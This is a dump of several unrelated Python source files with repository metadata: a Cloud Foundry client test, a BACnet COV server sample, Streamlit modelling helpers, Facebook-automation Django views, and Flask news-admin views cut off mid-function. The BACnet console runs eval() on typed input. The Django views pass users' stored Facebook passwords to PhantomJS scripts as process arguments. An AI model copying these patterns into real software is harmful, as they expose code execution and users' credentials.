stats: avg_line_length 48.177778 · max_line_length 207 · alphanum_fraction 0.482934 · count_classes 0 · score_classes 0 · count_generators 0 · score_generators 0 · count_decorators 0 · score_decorators 0 · count_async_functions 0 · score_async_functions 0 · count_documentation 869 · score_documentation 0.133528
hexsha `4c31c440814ac777bd4779fa4968cf1b1847bcac` · size 1,263 · ext py · lang Python

| events | path | repo | head hexsha | licenses | count | min datetime | max datetime |
|---|---|---|---|---|---|---|---|
| stars | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | ["Apache-2.0"] | 47 | 2017-12-17T00:54:33.000Z | 2022-02-25T09:54:52.000Z |
| issues | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | ["Apache-2.0"] | 125 | 2017-10-27T09:38:10.000Z | 2022-03-10T07:53:35.000Z |
| forks | integration/v2/test_service_instances.py | subhash12/cf-python-client | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | ["Apache-2.0"] | 50 | 2018-01-19T07:57:21.000Z | 2022-02-14T14:47:31.000Z |

content:
import logging
import unittest

from config_test import build_client_from_configuration

_logger = logging.getLogger(__name__)


class TestServiceInstances(unittest.TestCase):
    def test_create_update_delete(self):
        client = build_client_from_configuration()
        result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid,
                                                    client.creation_parameters)
        if len(client.update_parameters) > 0:
            client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters)
        else:
            _logger.warning("update test skipped")
        client.v2.service_instances.remove(result["metadata"]["guid"])

    def test_get(self):
        client = build_client_from_configuration()
        cpt = 0
        for instance in client.v2.service_instances.list():
            if cpt == 0:
                self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"]))
                self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"]))
                self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"]))
            cpt += 1
        _logger.debug("test_get - %d found", cpt)
43.551724
129
0.69517
1,133
0.89707
0
0
0
0
0
0
137
0.108472
4c31cf7c510d884081297346de14530206f0c46f
24
py
Python
runway/core/providers/__init__.py
troyready/runway
4fd299961a4b73df39e14f4f19a7236f7be17dd8
[ "Apache-2.0" ]
134
2018-02-26T21:35:23.000Z
2022-03-03T00:30:27.000Z
runway/core/providers/__init__.py
asksmruti/runway
8aca76df9372e3d13eb35e12f81758f618e89e74
[ "Apache-2.0" ]
937
2018-03-08T22:04:35.000Z
2022-03-30T12:21:47.000Z
runway/core/providers/__init__.py
asksmruti/runway
8aca76df9372e3d13eb35e12f81758f618e89e74
[ "Apache-2.0" ]
70
2018-02-26T23:48:11.000Z
2022-03-02T18:44:30.000Z
"""Runway providers."""
12
23
0.625
0
0
0
0
0
0
0
0
23
0.958333
4c32dcda5e8a9e2b82a81dd52550421a3c5cdcea
13,265
py
Python
samples/COVServer.py
noelli/bacpypes
c2f4d753ed86bc0357823e718e7ff16c05f06850
[ "MIT" ]
null
null
null
samples/COVServer.py
noelli/bacpypes
c2f4d753ed86bc0357823e718e7ff16c05f06850
[ "MIT" ]
null
null
null
samples/COVServer.py
noelli/bacpypes
c2f4d753ed86bc0357823e718e7ff16c05f06850
[ "MIT" ]
null
null
null
#!/usr/bin/env python

"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""

import time
from threading import Thread

from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd

from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask

from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices

# some debugging
_debug = 0
_log = ModuleLogger(globals())

# test globals
test_av = None
test_bv = None
test_application = None

#
#   SubscribeCOVApplication
#

@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
    pass

#
#   COVConsoleCmd
#

@bacpypes_debugging
class COVConsoleCmd(ConsoleCmd):

    def do_status(self, args):
        """status"""
        args = args.split()
        if _debug: COVConsoleCmd._debug("do_status %r", args)
        global test_application

        # dump from the COV detections dict
        for obj_ref, cov_detection in test_application.cov_detections.items():
            print("{} {}".format(obj_ref.objectIdentifier, obj_ref))

            for cov_subscription in cov_detection.cov_subscriptions:
                print("    {} proc_id={} confirmed={} lifetime={}".format(
                    cov_subscription.client_addr,
                    cov_subscription.proc_id,
                    cov_subscription.confirmed,
                    cov_subscription.lifetime,
                    ))

    def do_trigger(self, args):
        """trigger object_name"""
        args = args.split()
        if _debug: COVConsoleCmd._debug("do_trigger %r", args)
        global test_application

        if not args:
            print("object name required")
            return

        obj = test_application.get_object_name(args[0])
        if not obj:
            print("no such object")
            return

        # get the detection algorithm object
        cov_detection = test_application.cov_detections.get(obj, None)
        if (not cov_detection) or (len(cov_detection.cov_subscriptions) == 0):
            print("no subscriptions for that object")
            return

        # tell it to send out notifications
        cov_detection.send_cov_notifications()

    def do_set(self, args):
        """set object_name [ . ] property_name [ = ] value"""
        args = args.split()
        if _debug: COVConsoleCmd._debug("do_set %r", args)
        global test_application

        try:
            object_name = args.pop(0)
            if '.' in object_name:
                object_name, property_name = object_name.split('.')
            else:
                property_name = args.pop(0)
            if _debug: COVConsoleCmd._debug("    - object_name: %r", object_name)
            if _debug: COVConsoleCmd._debug("    - property_name: %r", property_name)

            obj = test_application.get_object_name(object_name)
            if _debug: COVConsoleCmd._debug("    - obj: %r", obj)
            if not obj:
                raise RuntimeError("object not found: %r" % (object_name,))

            datatype = obj.get_datatype(property_name)
            if _debug: COVConsoleCmd._debug("    - datatype: %r", datatype)
            if not datatype:
                raise RuntimeError("not a property: %r" % (property_name,))

            # toss the equals
            if args[0] == '=':
                args.pop(0)

            # evaluate the value
            value = eval(args.pop(0))
            if _debug: COVConsoleCmd._debug("    - raw value: %r", value)

            # see if it can be built
            obj_value = datatype(value)
            if _debug: COVConsoleCmd._debug("    - obj_value: %r", obj_value)

            # normalize
            value = obj_value.value
            if _debug: COVConsoleCmd._debug("    - normalized value: %r", value)

            # change the value
            setattr(obj, property_name, value)

        except IndexError:
            print(COVConsoleCmd.do_set.__doc__)
        except Exception as err:
            print("exception: %s" % (err,))

    def do_write(self, args):
        """write object_name [ . ] property [ = ] value"""
        args = args.split()
        if _debug: COVConsoleCmd._debug("do_write %r", args)
        global test_application

        try:
            object_name = args.pop(0)
            if '.' in object_name:
                object_name, property_name = object_name.split('.')
            else:
                property_name = args.pop(0)
            if _debug: COVConsoleCmd._debug("    - object_name: %r", object_name)
            if _debug: COVConsoleCmd._debug("    - property_name: %r", property_name)

            obj = test_application.get_object_name(object_name)
            if _debug: COVConsoleCmd._debug("    - obj: %r", obj)
            if not obj:
                raise RuntimeError("object not found: %r" % (object_name,))

            datatype = obj.get_datatype(property_name)
            if _debug: COVConsoleCmd._debug("    - datatype: %r", datatype)
            if not datatype:
                raise RuntimeError("not a property: %r" % (property_name,))

            # toss the equals
            if args[0] == '=':
                args.pop(0)

            # evaluate the value
            value = eval(args.pop(0))
            if _debug: COVConsoleCmd._debug("    - raw value: %r", value)

            # see if it can be built
            obj_value = datatype(value)
            if _debug: COVConsoleCmd._debug("    - obj_value: %r", obj_value)

            # normalize
            value = obj_value.value
            if _debug: COVConsoleCmd._debug("    - normalized value: %r", value)

            # pass it along
            obj.WriteProperty(property_name, value)

        except IndexError:
            print(COVConsoleCmd.do_write.__doc__)
        except Exception as err:
            print("exception: %s" % (err,))


@bacpypes_debugging
class TestAnalogValueTask(RecurringTask):

    """
    An instance of this class is created when '--avtask <interval>' is
    specified as a command line argument.  Every <interval> seconds it
    changes the value of the test_av present value.
    """

    def __init__(self, interval):
        if _debug: TestAnalogValueTask._debug("__init__ %r", interval)
        RecurringTask.__init__(self, interval * 1000)

        # make a list of test values
        self.test_values = list(float(i * 10) for i in range(10))

    def process_task(self):
        if _debug: TestAnalogValueTask._debug("process_task")
        global test_av

        # pop the next value
        next_value = self.test_values.pop(0)
        self.test_values.append(next_value)
        if _debug: TestAnalogValueTask._debug("    - next_value: %r", next_value)

        # change the point
        test_av.presentValue = next_value


@bacpypes_debugging
class TestAnalogValueThread(Thread):

    """
    An instance of this class is created when '--avthread <interval>' is
    specified as a command line argument.  Every <interval> seconds it
    changes the value of the test_av present value.
    """

    def __init__(self, interval):
        if _debug: TestAnalogValueThread._debug("__init__ %r", interval)
        Thread.__init__(self)

        # runs as a daemon
        self.daemon = True

        # save the interval
        self.interval = interval

        # make a list of test values
        self.test_values = list(100.0 + float(i * 10) for i in range(10))

    def run(self):
        if _debug: TestAnalogValueThread._debug("run")
        global test_av

        while True:
            # pop the next value
            next_value = self.test_values.pop(0)
            self.test_values.append(next_value)
            if _debug: TestAnalogValueThread._debug("    - next_value: %r", next_value)

            # change the point
            test_av.presentValue = next_value

            # sleep
            time.sleep(self.interval)


@bacpypes_debugging
class TestBinaryValueTask(RecurringTask):

    """
    An instance of this class is created when '--bvtask <interval>' is
    specified as a command line argument.  Every <interval> seconds it
    changes the value of the test_bv present value.
    """

    def __init__(self, interval):
        if _debug: TestBinaryValueTask._debug("__init__ %r", interval)
        RecurringTask.__init__(self, interval * 1000)

        # save the interval
        self.interval = interval

        # make a list of test values
        self.test_values = [True, False]

    def process_task(self):
        if _debug: TestBinaryValueTask._debug("process_task")
        global test_bv

        # pop the next value
        next_value = self.test_values.pop(0)
        self.test_values.append(next_value)
        if _debug: TestBinaryValueTask._debug("    - next_value: %r", next_value)

        # change the point
        test_bv.presentValue = next_value


@bacpypes_debugging
class TestBinaryValueThread(RecurringTask, Thread):

    """
    An instance of this class is created when '--bvthread <interval>' is
    specified as a command line argument.  Every <interval> seconds it
    changes the value of the test_bv present value.
    """

    def __init__(self, interval):
        if _debug: TestBinaryValueThread._debug("__init__ %r", interval)
        Thread.__init__(self)

        # runs as a daemon
        self.daemon = True

        # save the interval
        self.interval = interval

        # make a list of test values
        self.test_values = [True, False]

    def run(self):
        if _debug: TestBinaryValueThread._debug("run")
        global test_bv

        while True:
            # pop the next value
            next_value = self.test_values.pop(0)
            self.test_values.append(next_value)
            if _debug: TestBinaryValueThread._debug("    - next_value: %r", next_value)

            # change the point
            test_bv.presentValue = next_value

            # sleep
            time.sleep(self.interval)


def main():
    global test_av, test_bv, test_application

    # make a parser
    parser = ConfigArgumentParser(description=__doc__)
    parser.add_argument("--console",
        action="store_true",
        default=False,
        help="create a console",
        )

    # analog value task and thread
    parser.add_argument("--avtask", type=float,
        help="analog value recurring task",
        )
    parser.add_argument("--avthread", type=float,
        help="analog value thread",
        )

    # binary value task and thread
    parser.add_argument("--bvtask", type=float,
        help="binary value recurring task",
        )
    parser.add_argument("--bvthread", type=float,
        help="binary value thread",
        )

    # provide a different spin value
    parser.add_argument("--spin", type=float,
        help="spin time",
        default=1.0,
        )

    # parse the command line arguments
    args = parser.parse_args()

    if _debug: _log.debug("initialization")
    if _debug: _log.debug("    - args: %r", args)

    # make a device object
    this_device = LocalDeviceObject(ini=args.ini)
    if _debug: _log.debug("    - this_device: %r", this_device)

    # make a sample application
    test_application = SubscribeCOVApplication(this_device, args.ini.address)

    # make an analog value object
    test_av = AnalogValueObject(
        objectIdentifier=('analogValue', 1),
        objectName='av',
        presentValue=0.0,
        statusFlags=[0, 0, 0, 0],
        covIncrement=1.0,
        )
    _log.debug("    - test_av: %r", test_av)

    # add it to the device
    test_application.add_object(test_av)
    _log.debug("    - object list: %r", this_device.objectList)

    # make a binary value object
    test_bv = BinaryValueObject(
        objectIdentifier=('binaryValue', 1),
        objectName='bv',
        presentValue='inactive',
        statusFlags=[0, 0, 0, 0],
        )
    _log.debug("    - test_bv: %r", test_bv)

    # add it to the device
    test_application.add_object(test_bv)

    # make a console
    if args.console:
        test_console = COVConsoleCmd()
        _log.debug("    - test_console: %r", test_console)

        # enable sleeping will help with threads
        enable_sleeping()

    # analog value task
    if args.avtask:
        test_av_task = TestAnalogValueTask(args.avtask)
        test_av_task.install_task()

    # analog value thread
    if args.avthread:
        test_av_thread = TestAnalogValueThread(args.avthread)
        deferred(test_av_thread.start)

    # binary value task
    if args.bvtask:
        test_bv_task = TestBinaryValueTask(args.bvtask)
        test_bv_task.install_task()

    # binary value thread
    if args.bvthread:
        test_bv_thread = TestBinaryValueThread(args.bvthread)
        deferred(test_bv_thread.start)

    _log.debug("running")

    run(args.spin)

    _log.debug("fini")


if __name__ == "__main__":
    main()
30.354691
87
0.618168
9,271
0.698907
0
0
9,391
0.707953
0
0
3,533
0.26634
4c32edf19e346b501323693f4025d8d4782f7d64
973
py
Python
server/glassface/facebookfriender/views.py
theopak/glassface
bcb6c02636bda069d604a4da1dd09222e99be356
[ "MIT" ]
1
2017-02-24T16:18:24.000Z
2017-02-24T16:18:24.000Z
server/glassface/facebookfriender/views.py
theopak/glassface
bcb6c02636bda069d604a4da1dd09222e99be356
[ "MIT" ]
null
null
null
server/glassface/facebookfriender/views.py
theopak/glassface
bcb6c02636bda069d604a4da1dd09222e99be356
[ "MIT" ]
null
null
null
import os
import platform
import subprocess

from django.http import HttpResponse
from django.conf import settings


def add(request, friend):
    phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
    script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'facebookfriender.js')
    try:
        subprocess.call([phantomjs, script, friend,
                         request.user.get_profile().facebook_email,
                         request.user.get_profile().facebook_pass])
    except Exception:
        return False
    return True


def extract(request):
    phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
    script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'useridextractor.js')
    out = subprocess.check_output([phantomjs, script, request.POST['email'], request.POST['password']])
    print(out)
    return "user id goes here"
38.92
137
0.732785
0
0
0
0
0
0
0
0
221
0.227133
4c330026016ced54e01a326234695f3fe1fb584f
5,187
py
Python
fancylit/modeling/yellowbrick_funcs.py
rubyruins/fancylit
56a7cdfe78edd687a3b318bbbfa534203de1ace8
[ "Apache-2.0" ]
null
null
null
fancylit/modeling/yellowbrick_funcs.py
rubyruins/fancylit
56a7cdfe78edd687a3b318bbbfa534203de1ace8
[ "Apache-2.0" ]
null
null
null
fancylit/modeling/yellowbrick_funcs.py
rubyruins/fancylit
56a7cdfe78edd687a3b318bbbfa534203de1ace8
[ "Apache-2.0" ]
null
null
null
import random

import numpy as np
import pandas as pd
import streamlit as st
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from yellowbrick.classifier import classification_report
from yellowbrick.target import FeatureCorrelation
from yellowbrick.target import ClassBalance
from streamlit_yellowbrick import st_yellowbrick
from typing import Any, List, Tuple
import plotly.express as px


def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]:
    """
    Purpose:
        Prep data for modeling
    Args:
        df - Pandas dataframe
    Returns:
        test_features - test set features
        train_features - train set features
        test_target - test set target
        train_target - train set target
    """
    # Specify the target classes
    target_string = st.selectbox("Select Target Column", df.columns)
    target = np.array(df[target_string])

    # Select Features you want
    feature_cols = st.multiselect("Select Modeling Features", df.columns)

    # Get all features
    features = df[feature_cols]
    featurestmp = np.array(features)

    feats = []
    # find all bad rows
    for index, featarr in enumerate(featurestmp):
        try:
            featarr = featarr.astype(float)
            feats.append(featarr)
        except Exception as error:
            st.error(error)
            st.error(featarr)
            st.stop()

    featuresarr = np.array(feats)

    # Split Data
    randInt = random.randint(1, 200)
    (
        test_features,
        train_features,
        test_target,
        train_target,
    ) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt)

    return (
        test_features,
        train_features,
        test_target,
        train_target,
    )


def show_classification_report(
    df: pd.DataFrame,
) -> None:
    """
    Purpose:
        Renders a classification_report
    Args:
        df - Pandas dataframe
    Returns:
        N/A
    """
    # Prep data for model training
    (
        test_features,
        train_features,
        test_target,
        train_target,
    ) = data_prep(df)

    if st.button("Train Model"):
        st.header("Classification Report")
        st.markdown(
            "The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports."
        )

        # Instantiate the visualizer
        visualizer = classification_report(
            GaussianNB(),
            train_features,
            train_target,
            test_features,
            test_target,
            support=True,
        )

        # Get the viz
        fig = visualizer.fig
        ax = visualizer.show()
        fig.axes.append(ax)

        # show the viz
        st.write(fig)

        # TODO download model, Download report
        # TODO live predictions


def feature_correlation(df: pd.DataFrame) -> None:
    """
    Purpose:
        Renders a feature correlation graph
    Args:
        df - Pandas dataframe
    Returns:
        N/A
    """
    target_string = st.selectbox("Select Target Column", df.columns, key="selectbox-feature-correlation")
    residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"]
    feature_cols = st.multiselect("Select Modeling Features", residual_cols,
                                  key="multiselect-feature-correlation", default=residual_cols[:5])

    if str(df[target_string].dtype) == "object":
        method = 'mutual_info-classification'
    else:
        type_problem = st.selectbox("Select the type of problem", ['classification', 'regression'])
        if type_problem == 'classification':
            method = st.selectbox("Select the correlation method", ['mutual_info-classification', 'pearson'])
        else:
            method = st.selectbox("Select the correlation method", ['mutual_info-regression', 'pearson'])

    try:
        viz = FeatureCorrelation(method=method, feature_names=feature_cols, sort=True)
        viz.fit(df[feature_cols], df[target_string])
        fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation")
        st.plotly_chart(fig)
    except Exception:
        st.warning("Verify the type of problem that you select")


def class_balance(df: pd.DataFrame) -> None:
    """
    Purpose:
        Renders a class balance graph
    Args:
        df - Pandas dataframe
    Returns:
        N/A
    """
    classes = st.selectbox("Select Class Column", df.columns, index=len(df.columns) - 1)
    visualizer = ClassBalance(labels=df[classes].unique())
    visualizer.fit(df[classes])
    st_yellowbrick(visualizer)
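Since these helpers all take a plain DataFrame, a toy Streamlit page is enough to exercise them. A sketch, assuming the module is importable under the fancylit package path shown in this record and is launched with `streamlit run`:

# Hypothetical driver script for the helpers above (import path inferred
# from the file location; run with `streamlit run demo.py`).
import pandas as pd
import streamlit as st
from fancylit.modeling.yellowbrick_funcs import class_balance, feature_correlation

df = pd.DataFrame({
    "sepal_len": [5.1, 4.9, 6.3, 5.8],
    "sepal_wid": [3.5, 3.0, 3.3, 2.7],
    "species": ["setosa", "setosa", "virginica", "virginica"],
})
st.header("fancylit demo")
feature_correlation(df)  # renders a correlation bar chart
class_balance(df)        # renders a class-balance chart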
30.511765
389
0.614035
0
0
0
0
0
0
0
0
1,818
0.350492
4c33dde47e4450a45e6aa5280d3a4d98189d8d33
14,566
py
Python
info/modules/admin/views.py
moonbria/test1
05893bd91d416ca4093e4619ede427434fa665cc
[ "MIT" ]
null
null
null
info/modules/admin/views.py
moonbria/test1
05893bd91d416ca4093e4619ede427434fa665cc
[ "MIT" ]
null
null
null
info/modules/admin/views.py
moonbria/test1
05893bd91d416ca4093e4619ede427434fa665cc
[ "MIT" ]
null
null
null
from flask import request
import random
import re
from flask import current_app, jsonify
from flask import g
from flask import make_response
from flask import redirect
from flask import render_template
from flask import session
from flask import url_for
import time

from info import constants, db
from info import redis_store
from info.lib.yuntongxun.sms import CCP
from info.utils.captcha.captcha import captcha
from info.utils.image_storage import storage
from info.utils.response_code import RET
from info.modules.passport import passport_blu
from info.models import User, Category, News
from info.modules.profile import profile_blu
from info.utils.common import user_login_data
from datetime import datetime, timedelta
from . import admin_blu


@admin_blu.route("/login", methods=["GET", "POST"])
def admin_login():
    if request.method == "GET":
        # fetch the stored values from the session
        user_id = session.get("user_id", None)
        is_admin = session.get("is_admin", False)
        if user_id and is_admin:
            return redirect(url_for("admin_index"))
        return render_template("admin/login.html")

    # get the login parameters
    username = request.form.get("username")
    password = request.form.get("password")

    if not all([username, password]):
        return render_template("admin/login.html", errmsg="参数错误")

    try:
        user = User.query.filter(User.mobile == username).first()
    except Exception as e:
        current_app.logger.error(e)
        return render_template("admin/login.html", errmsg="数据错误")

    if not user:
        return render_template("admin/login.html", errmsg="用户名错误")

    if not user.check_password(password):
        return render_template("admin/login.html", errmsg="密码错误")

    if not user.is_admin:
        return render_template("admin/login.html", errmsg="用户不是管理员")

    session["user_id"] = user.id
    session["nick_name"] = user.nick_name
    session["mobile"] = user.mobile
    session["is_admin"] = True

    # redirect to the admin home page
    return redirect(url_for("admin.admin_index"))


@admin_blu.route("/index")
@user_login_data
def admin_index():
    user = g.user
    return render_template("admin/index.html", user=user.to_dict())


@admin_blu.before_request
def before_request():
    # only check requests that are not for the login page
    if not request.url.endswith(url_for("admin.admin_login")):
        user_id = session.get("user_id")
        is_admin = session.get("is_admin", False)
        if not user_id or not is_admin:
            # no user logged in, or the user is not an admin: redirect to the site home page
            return redirect("/")


@admin_blu.route("/user_count")
def user_count():
    # total number of users
    total_count = 0
    try:
        total_count = User.query.filter(User.is_admin == False).count()
    except Exception as e:
        current_app.logger.error(e)

    # users added this month
    mon_count = 0
    try:
        now = time.localtime()
        mon_begin = "%d-%02d-01" % (now.tm_year, now.tm_mon)
        mon_begin_date = datetime.strptime(mon_begin, "%Y-%m-%d")
        mon_count = User.query.filter(User.is_admin == False, User.create_time > mon_begin_date).count()
    except Exception as e:
        current_app.logger.error(e)

    # users added today
    day_count = 0
    try:
        day_begin = "%d-%02d-%02d" % (now.tm_year, now.tm_mon, now.tm_mday)
        day_begin_date = datetime.strptime(day_begin, "%Y-%m-%d")
        day_count = User.query.filter(User.is_admin == False, User.create_time >= day_begin_date).count()
    except Exception as e:
        current_app.logger.error(e)

    # data for the activity chart
    # get today's 00:00:00 timestamp
    now_date = datetime.strptime(datetime.now().strftime("%Y-%m-%d"), "%Y-%m-%d")
    print(now_date)
    # empty lists to collect the data
    active_date = list()
    active_count = list()
    # collect the daily counts, then reverse the lists
    for i in range(0, 31):
        begin_date = now_date - timedelta(days=i)
        end_date = now_date - timedelta(days=(i - 1))
        active_date.append(begin_date.strftime("%Y-%m-%d"))
        count = 0
        try:
            count = User.query.filter(User.is_admin == False, User.last_login >= begin_date,
                                      User.last_login < end_date).count()
            print(count)
        except Exception as e:
            current_app.logger.error(e)
        active_count.append(count)

    active_date.reverse()
    active_count.reverse()

    data = {"total_count": total_count, "mon_count": mon_count, "day_count": day_count,
            "active_date": active_date, "active_count": active_count}

    return render_template("admin/user_count.html", data=data)


@admin_blu.route("/user_list")
def user_list():
    """Return the user list."""
    # get parameters
    page = request.args.get("p", 1)
    try:
        print(page)
        page = int(page)
    except Exception as e:
        current_app.logger.error(e)
        page = 1

    # default values
    users = []
    current_page = 1
    total_page = 1

    # query the data
    try:
        paginate = User.query.filter(User.is_admin == False) \
            .order_by(User.last_login.desc()) \
            .paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
        users = paginate.items
        current_page = paginate.page
        total_page = paginate.pages
    except Exception as e:
        current_app.logger.error(e)

    # convert the model list to a list of dicts
    users_list = []
    for user in users:
        users_list.append(user.to_admin_dict())

    context = {
        "total_page": total_page,
        "current_page": current_page,
        "users": users_list
    }
    return render_template("admin/user_list.html", data=context)


@admin_blu.route("/news_review")
def news_review():
    """Return the list of news awaiting review."""
    page = request.args.get("p", 1)
    keywords = request.args.get("keywords", "")
    try:
        page = int(page)
    except Exception as e:
        current_app.logger.error(e)
        page = 1

    news_list = list()
    current_page = 1
    total_page = 1

    try:
        filters = [News.status != 0]
        # if keywords were given
        if keywords:
            # add a keyword filter
            filters.append(News.title.contains(keywords))
        paginate = News.query.filter(*filters) \
            .order_by(News.create_time.desc()) \
            .paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
        news_list = paginate.items
        current_page = paginate.page
        total_page = paginate.pages
    except Exception as e:
        current_app.logger.error(e)

    news_dict_list = list()
    for news in news_list:
        news_dict_list.append(news.to_review_dict())

    data = {
        "total_page": total_page,
        "current_page": current_page,
        "news_list": news_dict_list
    }
    return render_template("admin/news_review.html", data=data)


@admin_blu.route("/news_review_detail", methods=["GET", "POST"])
def news_review_detail():
    """Review a news item."""
    if request.method == "GET":
        # get the news id
        news_id = request.args.get("news_id")
        if not news_id:
            data = {"errmsg": "未查询到数据"}
            return render_template("admin/news_review_detail.html", data=data)

        # look the news up by id
        news = None
        try:
            news = News.query.get(news_id)
        except Exception as e:
            current_app.logger.error(e)

        if not news:
            data = {"errmsg": "未查询到数据"}
            return render_template("admin/news_review_detail.html", data=data)

        # return the data
        data = {"news": news.to_dict()}
        return render_template("admin/news_review_detail.html", data=data)

    # perform the review action
    # 1. get parameters
    news_id = request.json.get("news_id")
    action = request.json.get("action")
    # 2. validate parameters
    if not all([news_id, action]):
        return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
    if action not in ("accept", "reject"):
        return jsonify(errno=RET.PARAMERR, errmsg="参数错误")

    news = None
    try:
        # 3. query the news
        news = News.query.get(news_id)
    except Exception as e:
        current_app.logger.error(e)

    if not news:
        return jsonify(errno=RET.NODATA, errmsg="未查询到数据")

    if action == "accept":
        news.status = 0
    else:
        # rejection requires a reason
        reason = request.json.get("reason")
        if not reason:
            return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
        news.reason = reason
        news.status = -1

    # commit to the database
    try:
        db.session.commit()
    except Exception as e:
        current_app.logger.error(e)
        db.session.rollback()
        return jsonify(errno=RET.DBERR, errmsg="保存数据失败")

    return jsonify(errno=RET.OK, errmsg="操作成功")


@admin_blu.route("/news_edit", methods=["GET", "POST"])
def news_edit():
    """Return the news list."""
    page = request.args.get("p", "1")
    print(page)
    a = re.match(r"^\d*", page)
    b = re.findall(r"""keywords=(\w*)""", page)
    print(b)
    page = a.group()
    if b != []:
        b = b[0]
        keywords = b
    else:
        keywords = None
        b = ""
    try:
        page = int(page)
    except Exception as e:
        current_app.logger.error(e)
        page = 1

    news_list = list()
    current_page = 1
    total_page = 1
    try:
        filters = list()
        # if keywords were given
        if keywords:
            # add a keyword filter
            filters.append(News.title.contains(keywords))
        # query
        paginate = News.query.filter(*filters) \
            .order_by(News.create_time.desc()) \
            .paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
        news_list = paginate.items
        current_page = paginate.page
        total_page = paginate.pages
    except Exception as e:
        current_app.logger.error(e)

    news_dict_list = list()
    for news in news_list:
        news_dict_list.append(news.to_basic_dict())

    data = {
        "total_page": total_page,
        "current_page": current_page,
        "new_list": news_dict_list,
        "last_input": b
    }
    if request.method == "GET":
        return render_template("admin/news_edit.html", data=data)
        # return jsonify(errno=RET.OK, errmsg="OK")
    return render_template("admin/news_edit.html", data=data)


@admin_blu.route("/news_edit_detail", methods=["GET", "POST"])
def news_edit_detail():
    """News edit detail."""
    if request.method == "GET":
        # get parameters
        news_id = request.args.get("news_id")
        if not news_id:
            data = {"errmsg": "没有找到新闻"}
            return render_template("admin/news_edit_detail.html", data=data)

        # query the news
        news = None
        try:
            news = News.query.get(news_id)
        except Exception as e:
            current_app.logger.error(e)
        if not news:
            data = {"errmsg": "没有找到新闻"}
            return render_template("admin/news_edit_detail.html", data=data)

        categories = Category.query.all()
        categories_li = []
        for category in categories:
            c_dict = category.to_dict()
            c_dict["is_selected"] = False
            if category.id == news.category_id:
                c_dict["is_selected"] = True
            categories_li.append(c_dict)
        # remove the "latest" category
        categories_li.pop(0)

        data = {
            "news": news.to_dict(),
            "categories": categories_li
        }
        return render_template("admin/news_edit_detail.html", data=data)

    news_id = request.form.get("news_id")
    title = request.form.get("title")
    digest = request.form.get("digest")
    content = request.form.get("content")
    # uploaded files arrive in request.files rather than request.form
    index_image = request.files.get("index-image")
    categery_id = request.form.get("category_id")
    # 1.1 check that the required fields are present
    if not all([title, digest, content, categery_id]):
        return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
    print(title, digest, content, categery_id)

    news = None
    try:
        news = News.query.get(news_id)
    except Exception as e:
        current_app.logger.error(e)
    if not news:
        return jsonify(errno=RET.NODATA, errmsg="未找到新闻数据")

    # 1.2 try to read the image
    if index_image:
        try:
            index_image = index_image.read()
        except Exception as e:
            return jsonify(errno=RET.PARAMERR, errmsg="参数有误")

        # 2. upload the cover image to Qiniu
        try:
            key = storage(index_image)
        except Exception as e:
            current_app.logger.error(e)
            return jsonify(errno=RET.THIRDERR, errmsg="上传图片错误")
        news.index_image_url = constants.QINIU_DOMIN_PREFIX + key

    # 3. set the fields
    news.title = title
    news.digest = digest
    news.content = content
    news.category_id = categery_id

    # 4. commit to the database
    try:
        db.session.commit()
    except Exception as e:
        current_app.logger.error(e)
        db.session.rollback()
        return jsonify(errno=RET.DBERR, errmsg="保存数据失败")

    # 5. return the result
    return jsonify(errno=RET.OK, errmsg="编辑成功")


@admin_blu.route("/news_category")
def get_news_category():
    # fetch all categories
    categories = Category.query.all()
    # list to hold the category data
    categories_dicts = []

    for category in categories:
        # get the dict
        cate_dict = category.to_dict()
        # append it
        categories_dicts.append(cate_dict)

    categories_dicts.pop(0)
    # return the data
    data = {
        "categories": categories_dicts
    }
    return render_template("admin/news_type.html", data=data)


@admin_blu.route("/add_category", methods=["POST"])
def add_category():
    """Add or update a category."""
    category_id = request.json.get("id")
    category_name = request.json.get("name")
    print(category_name)
    if not category_name:
        return jsonify(errno=RET.PARAMERR, errmsg="参数错误")

    # if a category id was given, update that category
    if category_id:
        try:
            category = Category.query.get(category_id)
        except Exception as e:
            current_app.logger.error(e)
            return jsonify(errno=RET.DBERR, errmsg="查询数据失败")

        if not category:
            return jsonify(errno=RET.NODATA, errmsg="未查询到分类信息")

        category.name = category_name
        try:
